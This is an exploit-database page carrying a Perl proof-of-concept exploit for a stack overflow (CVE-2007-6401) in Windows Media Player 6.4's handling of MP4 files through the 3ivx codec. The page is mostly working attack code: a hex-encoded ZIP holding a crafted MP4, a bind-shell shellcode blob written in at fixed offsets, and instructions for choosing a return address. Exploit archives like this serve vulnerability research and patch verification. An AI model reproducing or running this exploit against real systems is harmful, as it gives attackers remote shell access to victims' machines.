Windows media player 6.4 MP4 Stack Overflow 0-day

2007.12.17
Credit: SYS 49152
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2007-6401
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/bin/perl # # Windows media player 6.4 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/coral/3ivx_d4_451_win.exe # # - open the MP4 file with mplayer2.exe # # SYS 49152 # gforce(put the @ here)operamail(put the . here)com # # update: # the latest 5.0.1 codec is still vulnerable use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); $zip_data = # code 724982 "\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\x56\xAC\x3F\x36\xC5". "\xE1\x2E\x98\x9A\x0A\x00\x00\x5C\xC2\x01\x00\x1E\x00\x00\x00". "\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66". "\x6F\x72\x5F\x6D\x70\x6C\x61\x79\x65\x72\x32\x2E\x6D\x70\x34". "\xED\xD7\x0B\x70\x54\xD5\x19\x07\xF0\xB3\x9B\x8D\x80\x10\x26". "\x55\x21\x6A\x29\x46\x40\x4D\x7D\xA4\x9B\x4D\xC8\x83\xA1\x1A". "\x62\x72\x49\xD1\x00\x05\x12\x23\x89\x81\x65\x77\x21\xCB\x66". "\xB3\xC9\xEE\xE6\x85\x80\x81\x28\x06\x8C\x96\x47\x78\x09\xD4". "\xA0\xA0\xC4\x32\x3E\xA0\x15\x47\xA7\x45\xC6\x22\xA6\x2A\x56". "\xAD\xF5\xD1\x8A\x15\x15\xA5\x5A\x85\x98\x89\x05\x5F\xFD\x4E". "\xEE\x7F\xDD\x55\x47\x4B\x47\xC7\x8E\xFA\xFF\xE9\xC7\x39\xBB". "\xF7\xDE\xF3\xF8\xCE\xBD\xE7\x66\x95\x52\xC9\xB3\xC3\x4D\x35". "\x45\x19\xE3\x92\x95\xD0\xA5\xBF\x26\xC3\xE1\x0D\x05\xFC\xFA". "\xB3\xB2\x74\x25\xF9\x03\x81\x7A\xA9\x55\xF9\xEB\x2B\xDD\xFA". "\xAB\xDD\x25\x3F\x39\xB6\xA7\x72\xFA\x21\xA5\xAC\xA5\x4A\x9D". "\xB7\x58\x59\x94\xFE\x3F\xEA\x33\x1F\xBE\xF8\x39\x57\x7D\x25". "\xAB\x52\x09\x1D\xE1\xA0\xD3\x27\xF5\xF2\xB0\xAF\xAF\xCF\x7E". "\xBA\xCF\xDD\x25\xC3\x2D\xD1\xD6\xA4\xDF\xCF\x77\xF1\x3F\xF5". "\x9B\x30\xD6\xEF\xF6\x3A\xA5\x92\xEC\x77\x47\xE7\x65\xF6\xB1". "\x3D\x5F\x0D\x2C\x55\xC5\x7F\xEC\x3B\xF1\xEC\x4A\x77\x55\x30". "\x72\x55\x28\x50\x57\xFD\xB9\x5E\x06\xBD\xE7\xF7\x56\xCF\x96". "\x4A\x62\xC8\x6F\x36\x04\xA3\xDC\xE6\xF7\xC3\xDC\x41\xCF\xEC". "\x98\x21\x0D\xAA\x0B\x56\x25\x9B\xF5\x41\xBB\x42\xE1\x59\x55". "\x52\x9F\x13\x0A\x87\xDC\x31\xE7\x5C\x21\x8B\xE0\xFC\xC2\x34". "\xAC\x2A\x51\x17\x32\x3C\x2D\xDD\x13\x72\x87\x74\x25\xAE\xB9". "\xB9\x79\x84\x94\x36\x29\x4F\xCB\x1D\xA2\xAC\x43\x95\x75\xEC". "\x36\x65\xE9\x7E\x2C\x5E\xBE\xB1\x9E\x92\x78\x92\x14\x16\xC9". "\xAB\x3A\x3D\x14\x0E\x87\xA2\xCD\x5A\xFF\x2A\x17\xE9\x7A\x8A". "\x74\xEF\xFA\xB4\x13\xB3\xCB\x21\x28\x47\xEA\x21\x9B\xF5\x81". "\x55\x72\xDE\xBC\xE8\x0C\xF5\xF5\xAA\xDF\xB7\x14\x4F\xC8\x10". "\x3E\x94\x78\x4F\x42\xD7\x77\x4A\xFC\x45\x62\xBB\x44\xB3\x84". "\xAC\x91\x65\x09\x8E\x6D\x91\xB8\x43\xE2\x5E\x89\x0D\x38\x77". "\x9D\x84\xDC\xB3\x16\x19\xBF\xE5\x16\x89\x36\x89\x3B\x25\x24". "\xCD\x96\xF9\x12\x4F\xE2\xF3\xAF\x24\x36\x22\x9E\x95\x78\x59". "\x62\x81\xC4\xEF\x25\xCA\x25\x66\x49\xEC\x42\x9F\xB2\xAC\x96". "\x22\x89\xB5\x12\xF2\x8C\x58\xF6\xA1\x7E\x2D\xEA\xCB\x25\xEE". "\x96\x58\x23\x21\xF9\xB5\xDC\x24\x51\x23\x51\x68\xF6\x6F\x3D". "\x59\xCA\x26\x89\xA9\x12\x25\x68\x2B\x5D\x62\xA9\x84\x17\xE7". "\xD6\x49\x84\x25\x0C\x89\x3D\x38\xFF\x25\x89\xD7\xF0\xFD\xE5". "\x12\x73\x10\x41\x94\xF3\x62\x4A\x37\xDA\xD1\xE3\xBE\x46\xC2". "\x83\xF3\xF4\xFC\x57\x20\x16\x49\xDC\x2C\xB1\x43\xE2\x3A\xC4". "\x0A\x8C\xBB\x1D\xB9\x5C\x87\xFA\x6F\x70\xAE\xCE\xC7\xAB\x12". "\xC7\x31\xC7\x95\x98\x9F\x1F\x79\x89\xE4\x4A\x8F\x73\x31\xAE". "\xFD\x2D\xCA\xDF\x49\xBC\x2D\x71\x40\x62\x35\xC6\x37\x37\x66". "\x2D\x1F\x91\x78\x00\xF9\x0F\x62\x8D\x1E\x96\x98\x89\xF6\xAB". "\x91\xEF\x0D\xC8\x53\x03\xD6\x5E\xB7\x7D\xB5\xC4\x2A\xE4\xE9". "\xEF\x12\xFF\xC4\x5A\x2E\xC5\x38\xF4\xFA\x36\x4A\x74\x4A\x5C". "\x8F\xF3\x57\x60\x0E\x95\x18\x87\x07\xD7\xD7\x21\x87\xDE\xCF". "\xCD\x4B\xF6\x26\x4B\xAB\x44\x87\xC4\x36\x94\xFA\xBA\x85\x38". "\xBF\x1A\x9F\x67\x63\x6C\xB5\x68\xB3\x4B\xE2\x6F\x18\xC7\x22". "\xF4\x1F\x42\xBE\x97\x21\x5F\x3E\xAC\x59\x10\xED\x34\x63\xDD". "\xE6\xE0\xBA\x6B\x31\x57\x7D\x6F\x3F\xAD\xCC\x7B\x79\x31\x72". "\x7F\x0D\x42\x5F\x13\xC6\xBC\x17\xA0\xFD\xF9\x68\x57\x1F\xDF". "\xAF\xCC\x67\xE1\x6D\xCC\x2B\x88\xF3\x3D\x18\x73\x08\x7D\xEB". "\x3E\xCB\xF0\xBD\x5C\x2B\x1B\x8B\xB9\x5E\x0B\x31\xBF\xCA\x98". "\x73\xCB\x70\x7E\x1D\x72\x3A\x2F\x66\xAC\xF3\x51\x5F\x8A\xCF". "\x7A\x9D\xEF\x97\xB8\x15\x63\x5C\x8D\xB9\xE8\xF1\x5C\x85\x6B". "\xFF\x85\x75\x9C\x87\xF5\xD2\xF7\x4A\x40\x99\xCF\x91\x07\x39". "\xBD\x3A\x66\x7E\x3A\x97\x1B\xD0\x57\x18\x39\xD0\xF7\xD0\xAB". "\x38\xB7\x16\x6B\xF1\x9C\x32\xEF\xE7\x76\xE4\x4C\xDF\x23\x2B". "\x91\xFB\x46\xCC\xC9\x17\x73\x4D\x13\xFA\xF3\xE1\x7C\x7D\xAE". "\x7E\x4E\x6E\x97\xB8\x51\x99\xF7\xCE\x53\x98\x8F\x1E\x83\xDE". "\x43\x1E\x54\xE6\x33\xA2\xEF\xB1\x16\x89\x83\x98\x6B\x15\x72". "\x1D\xC0\xBC\xD6\x61\x3D\x36\x21\x07\x0D\x18\xFB\x5E\xB4\xF3". "\x3C\xD6\x76\x21\xE6\xA8\xD7\xBA\x15\xE3\x8A\x3C\xCF\x8F\x23". "\xFF\x0D\xC8\xFF\x2C\x94\x7E\xCC\xC7\x8D\xB1\xD7\x60\x6E\x01". "\x44\x4D\xCC\x5A\x5F\x89\xF5\x69\xC0\x18\x9B\x50\xDF\x86\xF1". "\x2F\xC7\xBC\x75\x3B\xF7\x49\x4C\xC6\xDC\xDD\xC8\xE3\x38\x8C". "\x77\x22\xD6\xF8\x12\xE4\xEA\x5E\x7C\x97\xA3\xCC\x67\x44\xEF". "\xC3\x3F\x97\xB8\x58\xE2\x1E\x89\x6C\xB4\xAF\xE7\x5F\x8C\x75". "\xD1\x73\x2A\x45\x2E\x2B\x70\xBE\x5E\x7B\x2F\xE6\x96\xA9\xCC". "\x7B\x26\x13\xF9\xE8\xC1\x3A\x1B\xC8\x43\xAE\xC4\x74\x89\x11". "\x18\x9B\xCE\x67\x0A\xFA\x5F\x8E\x7C\xEA\x3D\x56\xDF\x1F\x6B". "\x90\xCB\xB9\xB8\xB6\x16\x39\xD3\xB9\x99\x81\xEF\x9B\x90\x73". "\xBD\x6E\xFA\xDE\x6A\x43\x79\x0E\xD6\x58\xD7\xFF\x8C\x5C\xBC". "\xA3\xCC\x7D\xBF\x16\xF9\x7C\x04\x79\xD8\xAA\xCC\x3D\xCC\x8D". "\xBC\x36\xC5\xAC\xEB\x2B\xC8\xB9\xBE\xC7\x66\xAA\xE8\x9E\x51". "\x83\x35\xD4\xFB\x55\x81\x32\xF7\x3B\x3F\xAE\xD3\xC7\x17\xE1". "\xBB\x1B\xD1\x97\x8E\x51\xF2\x9E\xFC\x40\xCA\x91\xC8\x81\xCE". "\x91\x43\x22\x49\xA2\x3F\xC6\xE0\xC1\x75\x37\x63\x9C\x8F\xCA". "\x73\x6D\x41\xFE\xF4\x7D\xA3\xF7\x21\x7D\x4F\x2D\xC1\x5A\x36". "\x23\x27\x3A\x77\x01\xF4\xB7\x18\x9F\x17\x22\xAF\xFA\x39\xBC". "\x12\x6D\x57\xA2\x5C\xA4\xA2\x7B\x4A\x64\x4F\xBA\x1E\x75\x2F". "\xC6\x57\xA9\xA2\xF7\x9A\xCE\xF5\x24\xE4\x7D\x26\xD6\x7A\x06". "\x8E\x4F\xC4\xE7\xC8\x3E\x5A\x87\x5C\xFA\xD1\x46\x0B\xDA\xD4". "\x6B\xA8\xDF\x47\x67\x49\xE4\xA1\x3D\xFD\x4E\x8D\xC3\x1C\xF4". "\xFD\xFC\x2E\xF2\xA3\xF3\xAC\xF7\x8E\x72\xB4\xA7\xEF\x6D\xBD". "\xF7\xBC\xA8\xCC\xF7\x53\x21\xDA\x98\x80\xF9\x85\xB0\xD6\xB3". "\x55\x74\xEF\xB9\x09\xDF\xB7\xAA\xE8\xFE\x3D\x17\xB9\xB9\x01". "\xE3\xAA\xC3\xB1\x05\x98\x4F\x33\xF2\x77\x0D\xAE\xF3\xA1\xAD". "\xC5\x2A\xFA\xEC\xEA\x3D\xEE\x3A\x15\xDD\x67\x1B\xB1\x1E\xEB". "\x71\x5D\x0B\xBE\xD3\x7B\xCF\x26\xAC\x7D\xE4\xEF\x9A\x6A\x8C". "\xAB\x59\x45\xEF\x5D\x7D\x2F\x05\x91\x23\x1D\x57\x60\x3C\x7E". "\xC4\xD5\x2A\xBA\x2F\x35\x62\x8E\x01\xF4\x35\x13\xEB\x73\x05". "\xD6\xD8\xA7\xA2\xEF\x09\xBF\x8A\xEE\xC9\x57\x61\x0E\x01\xCC". "\xC1\x83\xE3\xB1\xF7\x42\x23\xFA\x5F\x1C\x33\xF7\xF9\x18\x4B". "\x10\xE3\x95\xE7\x4B\x1D\xC7\x98\xCA\x90\xBF\x46\xF5\xE9\x5E". "\xA6\x7A\x91\x4F\x7D\xFF\xEA\xFB\x59\xEF\x9B\xFA\x5E\x5A\x83". "\x6B\x22\xCF\xAF\x0F\x63\x89\x3C\xDF\x2D\xC8\xEF\x92\x98\x39". "\xD6\x23\x77\x91\xB5\x5D\x8A\x71\x84\xD0\x47\xE4\x3D\x1D\xD9". "\xA3\x6E\xC6\xF5\x7A\x6D\x6E\xC7\xB8\x17\x20\xD7\xBA\x9D\xC8". "\xFB\x3C\xF2\x37\x65\xEC\xFB\xB1\x09\xFD\x96\xA3\xAE\x73\x54". "\x85\xF6\x9B\x90\xAB\x06\xAC\xB9\x7C\x56\x1B\x43\x61\x57\x00". "\x7F\x68\x8F\x94\x3F\x1D\x2E\x91\x78\x5A\xFE\x9C\xCA\x55\xD6". "\x93\x12\x94\xF5\x9C\x63\xCA\x9A\x7F\x40\x59\x3D\x15\xCA\x7A". "\x7D\xAB\xB2\x6E\x2B\x54\xD6\x47\xAD\xCA\xFA\xC6\x11\x15\xD7". "\x6F\xB3\x8A\x3B\xEF\x80\x8A\x1B\x7F\x83\x8A\xAB\x1C\xAB\xE2". "\x5A\xD7\xA9\xB8\x3B\x2F\x57\x71\x7F\xBA\x43\xC5\x1D\xBE\x50". "\xD9\xFA\x1D\x53\xB6\x73\xFF\xAD\x6C\xF9\x0F\x2B\x9B\xA7\xBF". "\xB2\x5D\x9B\xA8\x6C\x9B\x8B\x95\xED\xA1\x6A\x65\x7B\xA9\x5B". "\xD9\x3E\x2C\x54\xF1\x67\xBE\xA9\xE2\xC7\xA4\xA9\xF8\xD2\x37". "\x54\x7C\xFD\x0E\x15\xDF\xDE\xA6\xE2\x77\x96\xA8\xF8\xA7\x5F". "\x96\xD7\x5B\x5C\x9D\x3B\xEC\x94\x6D\xF7\x03\xBF\x27\x1C\xF9". "\x99\xF2\x99\xDF\x49\xF2\xDB\x2A\xE8\xAC\xA9\xA9\x8A\xFE\x56". "\xB0\xEC\x3C\xEC\x95\x9F\x0F\xF2\x4E\x78\xA0\xB3\xDA\xE9\x97". "\x72\x87\xDB\xD9\x77\x71\xDF\xEF\x9B\x49\xF5\x9E\x60\xB8\x2E". "\xE8\x49\x73\xA4\x67\x8C\xCE\xCC\xCA\xCE\xB1\x3B\x43\xF1\x56". "\x8B\x71\x91\xC5\x62\x14\x1A\xCD\xB9\x86\xFE\xAF\x79\x99\x59". "\x34\x9B\xC5\x30\xB3\xB0\x99\xC5\x40\xB3\xE8\x2E\xF8\xFA\x72". "\x0B\x26\x17\x94\x15\xE4\x5E\xDA\xFF\x58\xB8\xF5\xAD\x0B\xBA". "\x5A\x0E\xDF\xF3\xC2\x3B\x2F\x84\x47\xF5\x94\x2D\x0A\x9D\xFA". "\xC8\xF4\x8D\x9B\x5B\xDE\xFA\xF0\x60\xCF\x18\x7B\xC3\xDB\xA9". "\xB7\xB9\x2A\x72\xC6\x24\x3D\x71\x70\x61\xD2\x6B\xC7\x9F\xFA". "\xC7\x96\x3F\x94\x85\xCE\x5F\x9A\x97\xF4\xF1\xA1\xB2\x86\x37". "\x8B\xAA\x93\x3A\x52\x7C\xE5\xD9\x73\x0F\x94\x3F\xBB\x67\x43". "\xC9\xF6\x7D\xEB\x1A\x8A\x3F\x1A\x7C\xFF\xD2\x9D\xBB\x93\x3E". "\x3E\x58\xD6\xB0\xAF\xA8\xE4\xB9\xF3\xD7\x1B\x9B\x26\xEC\xAD". "\x4F\x4A\xB9\x73\x61\xF3\x43\xF1\xBE\xF1\x7B\x8B\xCE\xD8\x7E". "\xFE\x92\x92\xA4\xA7\x5E\x7C\x3F\xE9\x95\xFD\xB6\x9E\x9F\xB5". "\x4E\xAB\x39\x9A\xD3\x76\xBC\xBB\xC3\x71\xF7\xAA\xBB\x2E\x7A". "\x77\xD5\xFA\xC1\xAE\xDA\xBB\x56\xD4\x5E\xF5\xD1\xC9\xAE\x86". "\xF5\xCF\x34\xED\x1B\xBF\xAB\xFD\xB6\x55\xF6\x5F\x57\x0C\x75". "\x14\x6C\x4B\x7F\xFF\xB1\x8A\xC4\x01\x4F\x76\xAF\x1E\xF0\x72". "\xF7\x75\x03\x5C\xB5\x1D\x8E\xF2\xCD\x1D\x03\x86\xE4\x4E\x75". "\x64\x3F\x78\xDF\x26\x39\x66\x6F\x3B\xB2\x6A\xEB\xE5\x5D\xB3". "\xDE\xDF\x51\xB8\x62\xEB\x84\x6E\x5D\x1F\x79\xEA\x99\x6F\x4A". "\xFD\xE8\xCA\xC1\x5D\x15\x43\xBB\x7A\x8C\xDD\x1B\x5F\xEF\xCD". "\x69\x93\xFA\xD8\xDE\xBD\x1D\x8E\x4F\x1E\x9F\xB4\xBB\xF7\xE8". "\x2D\xA1\xC9\x29\x67\xDB\x9F\x4F\x19\xE5\x2B\x9F\x52\xB5\xE5". "\x40\x5B\xF6\xE9\xF7\x38\x2E\x4B\xDE\x72\xB2\xFF\x68\xCF\x33". "\xD9\x87\x97\x55\xEC\x1C\xEE\x6A\xD8\x94\xB0\xFF\xC8\xDA\x81". "\xBD\x1D\x6B\x07\x76\x1D\xC9\x59\xD6\x33\xE8\xAC\x19\x53\xBA". "\x73\xDA\x7A\x2B\x72\xFC\xAE\xDA\xA2\x84\x99\x23\xAC\x17\xBB". "\x1A\xDA\xA5\xBF\x9F\xB6\xCF\xDF\xB3\x7A\xEB\x84\x8A\xA1\x92". "\xC4\x61\xDF\xC0\x42\x7D\xB3\x0C\x22\xA2\xEF\x84\x5C\xE3\xEE". "\xFD\x46\x89\x51\x6A\xC4\x0F\x30\x5F\x93\x93\x8D\x32\x23\x3E". "\xD1\xAC\xCB\x8B\xF0\x13\xF9\xA7\xD0\x30\x5F\x9C\x85\x5F\x1A". "\xB6\x2F\x3B\x30\xD5\xB0\x95\xBE\x6A\x5C\x6A\x5C\xF6\x75\xE2". "\xD0\xA1\x43\x27\x32\x95\x13\x3A\x89\x88\xBE\xBB\x0A\xB5\xFF". "\xF7\x20\x88\x88\x88\x88\x88\xE8\x7B\xA9\x98\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\xE8\x87". "\xA0\x94\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\xBE\x57\x8A\x89\x88\x88\x88". "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x7E". "\x38\x66\x12\x11\x11\x11\x11\x11\x11\x11\xD1\x7F\x51\x40\xDF". "\x9E\x34\xA5\xD4\xB9\x9D\xE3\xA6\x4C\x93\x72\xB8\xDB\x19\x76". "\x4A\x69\x91\x50\x93\xBD\xF3\xE6\x79\x5D\xCE\x70\x20\xD9\xF0". "\xD6\x7B\xE4\x8B\xE4\x4E\x67\xD5\x2C\x29\x4F\x8F\x3D\x6B\x52". "\xBD\x27\xE8\x0E\x84\xF4\xF1\x33\xE7\x54\x07\x75\x79\x0A\x8E". "\x9B\x06\xEB\x2B\xC3\x41\x5F\x75\xCC\x95\x11\x16\x95\xD0\x57". "\x0E\x77\x7B\x43\x3E\x29\x87\x7E\xE1\xB8\xEE\x63\x58\xA7\xDB". "\xD9\x24\xE5\x69\xB1\xFD\x3A\xEC\x76\xBB\x14\x67\xB8\x6A\xBC". "\x55\x52\xFE\x08\xC7\x86\x44\x2E\xCD\xE9\x0C\x07\x02\x52\xA6". "\xC5\x5E\xE4\x9D\x56\x57\xED\x09\x25\xD7\x67\xA4\x66\xA5\xA6". "\xA5\xA6\xDB\x2F\x4C\xFE\x65\x9D\xD7\xE5\x9B\xE6\xF5\x7B\x92". "\x33\x53\x47\xA7\x3A\xE4\x9C\x5B\x2F\x12\xBA\x57\xBF\xC7\xA9". "\xC7\xAC\x5C\x01\x7F\xAA\xB3\xA6\xA6\xCA\x93\x6A\x5E\xAE\x47". "\x52\xED\xF4\x7B\x22\x0D\x4E\x9C\x34\xA5\x48\xAA\x73\x63\x3B". "\x4A\xB6\xF7\xC9\xCA\xF8\x6C\x25\x2D\xD3\x9E\x6E\x7E\x93\x53". "\x60\x37\x2B\xD9\x19\x38\x27\xCB\xEE\xE8\xAB\xA4\x8F\xCE\x33". "\xCC\x4A\x5A\x96\x79\x4E\x9A\x23\x3D\x1F\x95\xD1\x19\xD2\x78". "\xD3\x09\x8C\xF0\xC7\xB1\x23\xF4\x84\x66\x5C\x9A\x9F\x9F\x37". "\xE3\x17\xF9\xFA\xD0\x98\xD8\x81\xA6\xA5\x5F\x60\x14\xE4\x67". "\x66\x67\x39\x8C\x82\xBC\xD1\x79\x0E\x23\x2F\x23\x2F\x7B\x5C". "\x46\x5A\x66\x46\x76\x81\xC3\x9E\x61\x64\x8E\xCB\xBB\x20\xC7". "\x9E\x9D\xED\x90\x8E\x4F\x7A\x7D\x76\xD0\x23\x8D\xFE\x07\x50". "\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x08\x00\x56\xAC\x3F\x36". "\xC5\xE1\x2E\x98\x9A\x0A\x00\x00\x5C\xC2\x01\x00\x1E\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00". "\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66". "\x6F\x72\x5F\x6D\x70\x6C\x61\x79\x65\x72\x32\x2E\x6D\x70\x34". "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x4C\x00\x00". "\x00\xD6\x0A\x00\x00\x00\x00"; my $shellcode = # code 724982 "\x2B\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13". "\xC6\x5A\x9C\xA1\x83\xEB\xFC\xE2\xF4\x3A\x30\x77\xEC\x2E\xA3". "\x63\x5E\x39\x3A\x17\xCD\xE2\x7E\x17\xE4\xFA\xD1\xE0\xA4\xBE". "\x5B\x73\x2A\x89\x42\x17\xFE\xE6\x5B\x77\xE8\x4D\x6E\x17\xA0". "\x28\x6B\x5C\x38\x6A\xDE\x5C\xD5\xC1\x9B\x56\xAC\xC7\x98\x77". "\x55\xFD\x0E\xB8\x89\xB3\xBF\x17\xFE\xE2\x5B\x77\xC7\x4D\x56". "\xD7\x2A\x99\x46\x9D\x4A\xC5\x76\x17\x28\xAA\x7E\x80\xC0\x05". "\x6B\x47\xC5\x4D\x19\xAC\x2A\x86\x56\x17\xD1\xDA\xF7\x17\xE1". "\xCE\x04\xF4\x2F\x88\x54\x70\xF1\x39\x8C\xFA\xF2\xA0\x32\xAF". "\x93\xAE\x2D\xEF\x93\x99\x0E\x63\x71\xAE\x91\x71\x5D\xFD\x0A". "\x63\x77\x99\xD3\x79\xC7\x47\xB7\x94\xA3\x93\x30\x9E\x5E\x16". "\x32\x45\xA8\x33\xF7\xCB\x5E\x10\x09\xCF\xF2\x95\x09\xDF\xF2". "\x85\x09\x63\x71\xA0\x32\x5C\xA1\xA0\x09\x15\x40\x53\x32\x38". "\xBB\xB6\x9D\xCB\x5E\x10\x30\x8C\xF0\x93\xA5\x4C\xC9\x62\xF7". "\xB2\x48\x91\xA5\x4A\xF2\x93\xA5\x4C\xC9\x23\x13\x1A\xE8\x91". "\xA5\x4A\xF1\x92\x0E\xC9\x5E\x16\xC9\xF4\x46\xBF\x9C\xE5\xF6". "\x39\x8C\xC9\x5E\x16\x3C\xF6\xC5\xA0\x32\xFF\xCC\x4F\xBF\xF6". "\xF1\x9F\x73\x50\x28\x21\x30\xD8\x28\x24\x6B\x5C\x52\x6C\xA4". "\xDE\x8C\x38\x18\xB0\x32\x4B\x20\xA4\x0A\x6D\xF1\xF4\xD3\x38". "\xE9\x8A\x5E\xB3\x1E\x63\x77\x9D\x0D\xCE\xF0\x97\x0B\xF6\xA0". "\x97\x0B\xC9\xF0\x39\x8A\xF4\x0C\x1F\x5F\x52\xF2\x39\x8C\xF6". "\x5E\x39\x6D\x63\x71\x4D\x0D\x60\x22\x02\x3E\x63\x77\x94\xA5". "\x4C\xC9\x29\x94\x7C\xC1\x95\xA5\x4A\x5E\x16\x5A\x9C\xA1"; open(code, ">tempzip.zip") || die "Can't Write temporary File\n"; binmode (code); print code $zip_data; close (code); print "\nTemporary file ready, patching..\n"; my $zip = Archive::Zip->new(); $zip->read( 'tempzip.zip' ) ; $zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' ); open(code, "+<SYS_49152_MP4_for_mplayer2.mp4") || die "Can't Open temporary File\n"; binmode (code); seek code,3875,0; print code $shellcode; print "\nShellcode added..\n"; seek code,5566,0; print "\nChose a good return address:\nThe right way would be to attach a debugger to mplayer2.exe\n"; print "and find the address of the pop edi, pop esi, retn sequence\ninside 3ivx.dll, "; print "to get the second byte, but usually a value\nbetween 0xC6, 0xED or 0xCE should work..\n"; print code chr(hex($a=<STDIN>)); print "\nAddress added, have fun!\n"; close (code); #indeed this sploit could have been written better without the ret address hassle, #but it's intended to be only a POC, not a weapon for kiddies..


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top